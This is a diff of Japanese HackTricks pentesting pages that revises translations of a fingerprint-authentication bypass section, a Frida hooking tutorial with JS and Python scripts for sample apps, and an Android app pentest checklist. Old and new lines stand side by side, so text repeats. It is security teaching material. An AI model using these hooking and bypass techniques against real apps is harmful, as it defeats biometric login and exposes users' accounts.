以下は、Fridaコンソールで`bypass()`を入力してバイパスをアクティブ化するために、指紋認証画面に到達し`authenticate()`を開始した後の手順です:
```
Spawning com.generic.insecurebankingfingerprint...
[Android Emulator 5554::com.generic.insecurebankingfingerprint]-> Hooking BiometricPrompt.authenticate()...
@ -43,31 +45,31 @@ Hooking BiometricPrompt.authenticate2()...
Hooking FingerprintManager.authenticate()...
[Android Emulator 5554::com.generic.insecurebankingfingerprint]-> bypass()
```
### **方法3 インストゥルメンテーションフレームワーク**
### **方法3 Instrumentation Frameworks**
インストゥルメンテーションフレームワーク、例えばXposedやFridaは、ランタイムでアプリケーションメソッドにフックするために使用できます。指紋認証において、これらのフレームワークは以下のことができます
Instrumentation frameworks like Xposed or Frida can be used to hook into application methods at runtime. For fingerprint authentication, these frameworks can:
1. **認証コールバックのモック**: `BiometricPrompt.AuthenticationCallback`の`onAuthenticationSucceeded`、`onAuthenticationFailed`、または`onAuthenticationError`メソッドにフックすることで、指紋認証プロセスの結果を制御できます。
2. **SSLピンニングのバイパス**: これにより、攻撃者はクライアントとサーバー間のトラフィックを傍受し、変更することができ、認証プロセスを変更したり、機密データを盗んだりする可能性があります。
1. **Mock the Authentication Callbacks**: By hooking into the `onAuthenticationSucceeded`, `onAuthenticationFailed`, or `onAuthenticationError` methods of the `BiometricPrompt.AuthenticationCallback`, you can control the outcome of the fingerprint authentication process.
2. **Bypass SSL Pinning**: This allows an attacker to intercept and modify the traffic between the client and the server, potentially altering the authentication process or stealing sensitive data.
Fridaの例コマンド
Example command for Frida:
```bash
frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in
```
### **方法 4 リバースエンジニアリング & コード変更**
### **方法4 逆コンパイルとコードの変更**
`APKTool`、`dex2jar`、`JD-GUI` などのリバースエンジニアリングツールを使用して、Androidアプリケーションを逆コンパイルし、ソースコードを読み、認証メカニズムを理解することができます。一般的な手順は以下の通りです:
`APKTool`、`dex2jar`、`JD-GUI`などの逆コンパイルツールを使用して、Androidアプリケーションを逆コンパイルし、ソースコードを読み取り、認証メカニズムを理解することができます。一般的な手順は次のとおりです:
1. **APKの逆コンパイル**APKファイルをより人間が読みやすい形式Javaコードなどに変換します。
2. **コードの分析**:指紋認証の実装を探し、潜在的な弱点(フォールバックメカニズムや不適切な検証チェックなど)を特定します。
3. **APKの再コンパイル**指紋認証をバイパスするためにコードを変更した後、アプリケーションを再コンパイルし、署名してデバイスにインストールしテストします。
1. **APKの逆コンパイル**: APKファイルをより人間が読みやすい形式Javaコードなどに変換します。
2. **コードの分析**: 指紋認証の実装を探し、フォールバックメカニズムや適切でない検証チェックなどの潜在的な弱点を特定します。
3. **APKの再コンパイル**: 指紋認証をバイパスするためにコードを変更した後、アプリケーションを再コンパイルし、署名してデバイスにインストールしテストします。
### **方法 5 カスタム認証ツールの使用**
### **方法5 カスタム認証ツールの使用**
認証メカニズムをテストし、バイパスするために設計された専門的なツールやスクリプトがあります。例えば:
認証メカニズムをテストおよびバイパスするために設計された専門ツールやスクリプトがあります。たとえば:
1. **MAGISKモジュール**MAGISKはAndroid用のツールで、デバイスをルート化し、指紋情報を含むハードウェアレベルの情報を変更または偽装するモジュールを追加することができます。
2. **カスタムビルドスクリプト**Android Debug BridgeADBやアプリケーションのバックエンドと直接対話し、指紋認証をシミュレートまたはバイパスするスクリプトを作成することができます。
1. **MAGISKモジュール**: MAGISKはAndroid用のツールで、ユーザーがデバイスをルート化し、指紋などのハードウェアレベルの情報を変更またはスプーフィングできるモジュールを追加できます。
2. **カスタムスクリプト**: スクリプトを作成して、Android Debug BridgeADBやアプリケーションのバックエンドと直接やり取りし、指紋認証をシミュレートしたりバイパスしたりすることができます。
# 参考文献
* [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/)
@ -76,10 +78,10 @@ frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksにあなたの会社を広告したいですか** または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか** [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**にフォローしてください。**
* **[hacktricks repo](https://github.com/carlospolop/hacktricks)や[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手します
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**します。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

70
mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
View file

@ -1,37 +1,33 @@
# Fridaチュートリアル2
# Frida チュートリアル 2
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**してみたいですか?または、**PEASS の最新バージョンを入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* [**公式 PEASS & HackTricks スウェグ**](https://peass.creator-spring.com) を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discord グループ**に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォローしてください。**
* **ハッキングトリックを共有するには、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) と [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)** PR を提出してください。
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FwdlXOpyZOVGNzyhOiiFK%2Fimage%20(1).png?alt=media&#x26;token=13f4d279-7d3f-47ce-a68e-35f9a906973f" alt=""><figcaption></figcaption></figure>
​もし**ハッキングのキャリア**に興味があり、**解読不能なものをハック**したい場合は、**採用中です**流暢なポーランド語の読み書きが必要です)。
**ハッキングキャリア**に興味がある方、**解読不能なものをハック**したい方 - **採用中です!**_流暢なポーランド語の読み書きが必要です_)。
{% embed url="https://www.stmcyber.com/careers" %}
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/)(パート 2、3、4\
**APK およびソースコード**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
パート 1 は非常に簡単です。
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/)パート2、3、4\
**APKとソースコード**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
## パート 2
パート1はとても簡単です。
**オリジナルのコードの一部は動作しないため、ここで修正されています。**
## パート2
ここでは、**同じ名前の2つの関数をフックする**例を見ることができますが、パラメータが異なります。\
また、**独自のパラメータで関数を呼び出す方法**を学ぶことができます。\
最後に、クラスのインスタンスを見つけて関数を呼び出す例もあります。
ここでは、**同じ名前の関数をフックする例**と、異なるパラメータを持つ関数をフックする方法を示します。\
また、**独自のパラメータで関数を呼び出す方法**を学びます。\
最後に、**クラスのインスタンスを見つけ、その関数を呼び出す方法**の例があります。
```javascript
//s2.js
console.log("Script loaded successfully ");
@ -66,7 +62,7 @@ onComplete: function () { }
});
});
```
以下は、Stringを作成するために、まずクラス_java.lang.String_を参照し、そのクラスの_$new_オブジェクトを作成しています。このオブジェクトは、Stringを内容として持っています。これはクラスの新しいオブジェクトを作成する正しい方法です。ただし、この場合、`this.fun()`には任意のStringを渡すことができます。例えば、`this.fun("hey there!")`といった具合です。
あなたは、Stringを作成するためにまず_java.lang.String_クラスを参照し、そのクラスのStringを内容とする_$new_オブジェクトを作成していることがわかります。これはクラスの新しいオブジェクトを作成する正しい方法です。しかし、この場合、`this.fun("hey there!")`のように任意のStringを`this.fun()`に渡すことができます。
### Python
```python
@ -93,7 +89,7 @@ python loader.py
### Python
次に、Pythonを使用してフックされたアプリにコマンドを送信し、関数を呼び出す方法を見ていきます。
次に、Pythonを使用してフックされたアプリにコマンドを送信して関数を呼び出す方法を見ていきます:
```python
//loader.py
import time
@ -124,9 +120,9 @@ script.exports.callsecretfunction()
elif command == "3":
script.exports.hooksecretfunction()
```
コマンド "**1**" は **終了** します。コマンド "**2**" はクラスのインスタンスを見つけて、**private関数** _**secret()**_ を呼び出します。コマンド "**3**" は関数 _**secret()**_ を**フック**して**異なる文字列**を**返します**。
コマンド "**1**" は**終了**します、コマンド "**2**" は**クラスのインスタンスを見つけてプライベート関数** _**secret()**_ **を呼び出し**コマンド "**3**" は関数 _**secret()**_ を**フック**して**異なる文字列**を**返す**ようにします
したがって、コマンド "**2**" を呼び出すと、**本当の秘密**が表示されますが、コマンド "**3**" を呼び出してから "**2**" を呼び出すと**偽の秘密**が表示されます。
したがって、"**2**" を呼び出すと**実際の秘密**が表示されますが、"**3**" を呼び出してから "**2**" を呼び出すと**偽の秘密**が表示されます。
### JS
```javascript
@ -169,7 +165,7 @@ hooksecretfunction: hookSecret
```
## パート4
ここでは、JSONオブジェクトを使用して**PythonとJSが相互作用する方法**を見ていきます。JSは`send()`関数を使用してデータをPythonクライアントに送信し、Pythonは`post()`関数を使用してデータをJSスクリプトに送信します。**JSはPythonからの応答を受け取るまで実行をブロック**します。
ここでは、JSONオブジェクトを使用して**PythonとJSが相互作用する方法**を示します。JSは`send()`関数を使用してデータをPythonクライアントに送信し、Pythonは`post()`関数を使用してデータをJSスクリプトに送信します。**JSはPythonからの応答を受信するまで実行をブロックします**。
### Python
```python
@ -205,17 +201,7 @@ raw_input()
```
### JS
JavaScriptJSは、Webページの動的な機能を作成するために使用されるプログラミング言語です。フロントエンド開発やWebアプリケーションの作成に広く使用されています。JSはクライアントサイドで実行され、HTMLやCSSと組み合わせて使用されます。また、Node.jsというサーバーサイドの実行環境でも使用することができます。
JSは非常に柔軟であり、動的なWebページの作成やユーザーとの対話を可能にします。さまざまなタスクを実行するための多くの組み込み関数やメソッドがあります。また、外部のライブラリやフレームワークを使用することもできます。
JSはユーザーのブラウザ上で実行されるため、セキュリティ上の懸念があります。悪意のあるコードが実行されると、ユーザーのデータやプライバシーが危険にさらされる可能性があります。そのため、セキュリティの観点からJSの脆弱性を理解し、適切な対策を講じることが重要です。
Fridaは、モバイルアプリのセキュリティテストや解析に使用されるツールです。Fridaを使用すると、実行中のアプリケーションの動作を監視し、変更することができます。これにより、アプリケーションの内部の動作を理解し、セキュリティ上の問題を特定することができます。
FridaはJavaScriptを使用してスクリプトを作成し、実行することができます。これにより、アプリケーションの動作をカスタマイズし、特定の機能を追加することができます。また、Fridaを使用してアプリケーションの通信を傍受し、データの盗聴や改ざんを行うことも可能です。
Fridaは、モバイルアプリのペネトレーションテストやセキュリティ解析において非常に強力なツールです。しかし、悪意のある目的で使用される可能性もあるため、適切な許可なしに使用することは違法です。常に法律と倫理に従い、正当な目的でFridaを使用するようにしてください。
### JS
```javascript
console.log("Script loaded successfully ");
Java.perform(function () {
@ -232,13 +218,13 @@ return this.setText(string_to_recv);
}
});
```
5 章は新しい内容がないため、説明はしません。しかし、読みたい場合はこちらから読むことができます: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
部分5は新しい情報がないため、説明はしませんが、読みたい場合はこちらから: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FwdlXOpyZOVGNzyhOiiFK%2Fimage%20(1).png?alt=media&#x26;token=13f4d279-7d3f-47ce-a68e-35f9a906973f" alt=""><figcaption></figcaption></figure>
もし **ハッキングのキャリア** に興味があり、アンハッカブルなものをハックしたい場合 - **採用中です!** (_流暢なポーランド語の読み書きが必要です_).
**ハッキングキャリア**に興味がある方や、**解読不能なものをハック**したい方 - **採用中です!**_流暢なポーランド語の読み書きが必要です_
{% embed url="https://www.stmcyber.com/careers" %}
@ -246,10 +232,10 @@ return this.setText(string_to_recv);
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で会社を宣伝**したいですか?または、**最新バージョンの PEASS を入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をご覧ください。独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションです。
* [**公式の PEASS & HackTricks スワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォローしてください。**
* **ハッキングトリックを共有するには、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)** PR を提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新版のPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
</details>

81
mobile-pentesting/android-checklist.md
View file

@ -4,77 +4,80 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**してみたいですか?または、**PEASS の最新バージョンを入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* [**公式の PEASS & HackTricks スウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に**参加**するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** を**フォロー**してください。
* **ハッキングトリックを共有する**には、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) と [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud) に PR を提出してください。
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
脆弱性を見つけて、より早く修正できるようにしましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリまで、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
最も重要な脆弱性を見つけて修正を迅速化します。Intruder は攻撃面を追跡し、積極的な脅威スキャンを実行し、API から Web アプリやクラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
### [Androidの基礎を学ぶ](android-app-pentesting/#2-android-application-fundamentals)
### [Android の基礎を学ぶ](android-app-pentesting/#2-android-application-fundamentals)
* [ ] [基本](android-app-pentesting/#fundamentals-review)
* [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
* [ ] [エントリーポイント](android-app-pentesting/#application-entry-points)
* [ ] [アクティビティ](android-app-pentesting/#launcher-activity)
* [ ] [URLスキーム](android-app-pentesting/#url-schemes)
* [ ] [URL スキーム](android-app-pentesting/#url-schemes)
* [ ] [コンテンツプロバイダー](android-app-pentesting/#services)
* [ ] [サービス](android-app-pentesting/#services-1)
* [ ] [ブロードキャストレシーバー](android-app-pentesting/#broadcast-receivers)
* [ ] [インテント](android-app-pentesting/#intents)
* [ ] [インテントフィルター](android-app-pentesting/#intent-filter)
* [ ] [その他のコンポーネント](android-app-pentesting/#other-app-components)
* [ ] [ADBの使用方法](android-app-pentesting/#adb-android-debug-bridge)
* [ ] [Smaliの修正方法](android-app-pentesting/#smali)
* [ ] [ADB の使用方法](android-app-pentesting/#adb-android-debug-bridge)
* [ ] [Smali の修正方法](android-app-pentesting/#smali)
### [静的解析](android-app-pentesting/#static-analysis)
* [ ] [難読化の使用をチェック](android-checklist.md#some-obfuscation-deobfuscation-information)し、モバイルがルート化されているか、エミュレータが使用されているか、防御チェックが行われているかを確認します。[詳細はこちらを参照](android-app-pentesting/#other-checks)。
* [ ] 銀行アプリなどの重要なアプリケーションは、モバイルがルート化されているかどうかをチェックし、それに応じて動作する必要があります。
* [ ] [興味深い文字列](android-app-pentesting/#looking-for-interesting-info)パスワード、URL、API、暗号化、バックドア、トークン、Bluetooth UUIDなどを検索します。
* [ ] [Firebase](android-app-pentesting/#firebase)のAPIに特に注意します。
* [ ] [マニフェストを読む:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml)
* [ ] アプリケーションがデバッグモードになっているかどうかをチェックし、それを「悪用」しようとします
* [ ] APKがバックアップを許可しているかどうかをチェックします
* [ ] [難読化](android-checklist.md#some-obfuscation-deobfuscation-information) の使用をチェックし、モバイルがルート化されているか、エミュレータが使用されているか、およびアンチタンパリングチェックを行います。詳細は[こちらを参照](android-app-pentesting/#other-checks)。
* [ ] 銀行アプリなどの**機密アプリケーション**は、モバイルがルート化されているかどうかをチェックし、それに応じて動作する必要があります。
* [ ] [興味深い文字列](android-app-pentesting/#looking-for-interesting-info) (パスワード、URL、API、暗号化、バックドア、トークン、Bluetooth UUID など) を検索します。
* [ ] [firebase ](android-app-pentesting/#firebase)API に特に注意します。
* [ ] マニフェストを読む:
* [ ] アプリケーションがデバッグモードにあるかどうかをチェックし、「攻撃」を試みます
* [ ] APK がバックアップを許可しているかどうかを確認します
* [ ] エクスポートされたアクティビティ
* [ ] コンテンツプロバイダー
* [ ] 公開されたサービス
* [ ] ブロードキャストレシーバー
* [ ] URLスキーム
* [ ] アプリケーションが内部または外部でデータを安全に保存しているかどうかandroid-app-pentesting/#insecure-data-storageを確認しますか
* [ ] パスワードがハードコードされているかディスクに保存されているかandroid-app-pentesting/#poorkeymanagementprocessesを確認しますかアプリは安全でない暗号アルゴリズムを使用していますかandroid-app-pentesting/#useofinsecureandordeprecatedalgorithms
* [ ] PIEフラグを使用してコンパイルされたすべてのライブラリはありますか?
* [ ] このフェーズで役立つ[静的Androidアナライザー](android-app-pentesting/#automatic-analysis)がたくさんありますので、忘れないでください。
* [ ] URL スキーム
* [ ] アプリケーションが内部または外部に**安全でないデータを保存**しているかどうかは
* [ ] パスワードがハードコードされているか、ディスクに保存されているかは?アプリが**安全でない暗号アルゴリズム**を使用しているかは
* [ ] すべてのライブラリが PIE フラグを使用してコンパイルされていますか?
* [ ] このフェーズ中に役立つ**多くの[静的 Android アナライザー](android-app-pentesting/#automatic-analysis)**があることを忘れないでください。
### [動的解析](android-app-pentesting/#dynamic-analysis)
* [ ] 環境を準備します([オンライン](android-app-pentesting/#online-dynamic-analysis)、[ローカルVMまたは物理的な環境](android-app-pentesting/#local-dynamic-analysis)
* [ ] [意図しないデータの漏洩](android-app-pentesting/#unintended-data-leakage)(ログ、コピー/貼り付け、クラッシュログ)はありますか?
* [ ] [SQLiteデータベースに保存されている機密情報](android-app-pentesting/#sqlite-dbs)はありますか?
* [ ] [悪用可能な公開されたアクティビティ](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)はありますか?
* [ ] [悪用可能なコンテンツプロバイダー](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)はありますか?
* [ ] [悪用可能な公開されたサービス](android-app-pentesting/#exploiting-services)はありますか?
* [ ] [悪用可能なブロードキャストレシーバー](android-app-pentesting/#exploiting-broadcast-receivers)はありますか?
* [ ] アプリケーションは情報を平文で送信していますか弱いアルゴリズムを使用していますかandroid-app-pentesting/#insufficient-transport-layer-protectionMitM攻撃は可能ですか
* [ ] HTTP/HTTPSトラフィックを検査しますandroid-app-pentesting/#inspecting-http-traffic
* [ ] これは非常に重要です。HTTPトラフィックをキャプチャできれば、一般的なWebの脆弱性を検索できますHacktricksにはWebの
### 一部の難読化/難読化解除の情報
* [ ] 環境を準備します([オンライン](android-app-pentesting/#online-dynamic-analysis)、[ローカル VM または物理](android-app-pentesting/#local-dynamic-analysis)
* [ ] [意図しないデータ漏洩](android-app-pentesting/#unintended-data-leakage) (ログ記録、コピー/貼り付け、クラッシュログ) がありますか?
* [ ] SQLite データベースに**保存されている機密情報**はありますか?
* [ ] **悪用可能な公開されたアクティビティ** がありますか?
* [ ] **悪用可能なコンテンツプロバイダー** がありますか?
* [ ] **悪用可能な公開されたサービス** がありますか?
* [ ] **悪用可能なブロードキャストレシーバー** がありますか?
* [ ] アプリケーションが**平文で情報を送信**しているか、**弱いアルゴリズムを使用**しているかはMitM が可能ですか?
* [ ] HTTP/HTTPS トラフィックを**検査**します
* [ ] これは非常に重要です。HTTP トラフィックをキャプチャできれば、一般的な Web 脆弱性を検索できますHacktricks には Web 脆弱性に関する多くの情報があります)。
* [ ] 可能な**Android クライアントサイドインジェクション**をチェックします(おそらくここでいくつかの静的コード分析が役立つでしょう)
* [ ] [Frida](android-app-pentesting/#frida)Frida だけを使用して、アプリケーションから興味深い動的データを取得します(おそらくいくつかのパスワード...
### 難読化/難読化解除情報
* [ ] [こちらを読んでください](android-app-pentesting/#obfuscating-deobfuscating-code)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて、より速く修正できるようにしましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリまでクラウドシステム全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今日から
最も重要な脆弱性を見つけて修正を迅速化します。Intruder は攻撃面を追跡し、積極的な脅威スキャンを実行し、API から Web アプリやクラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -82,10 +85,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを。
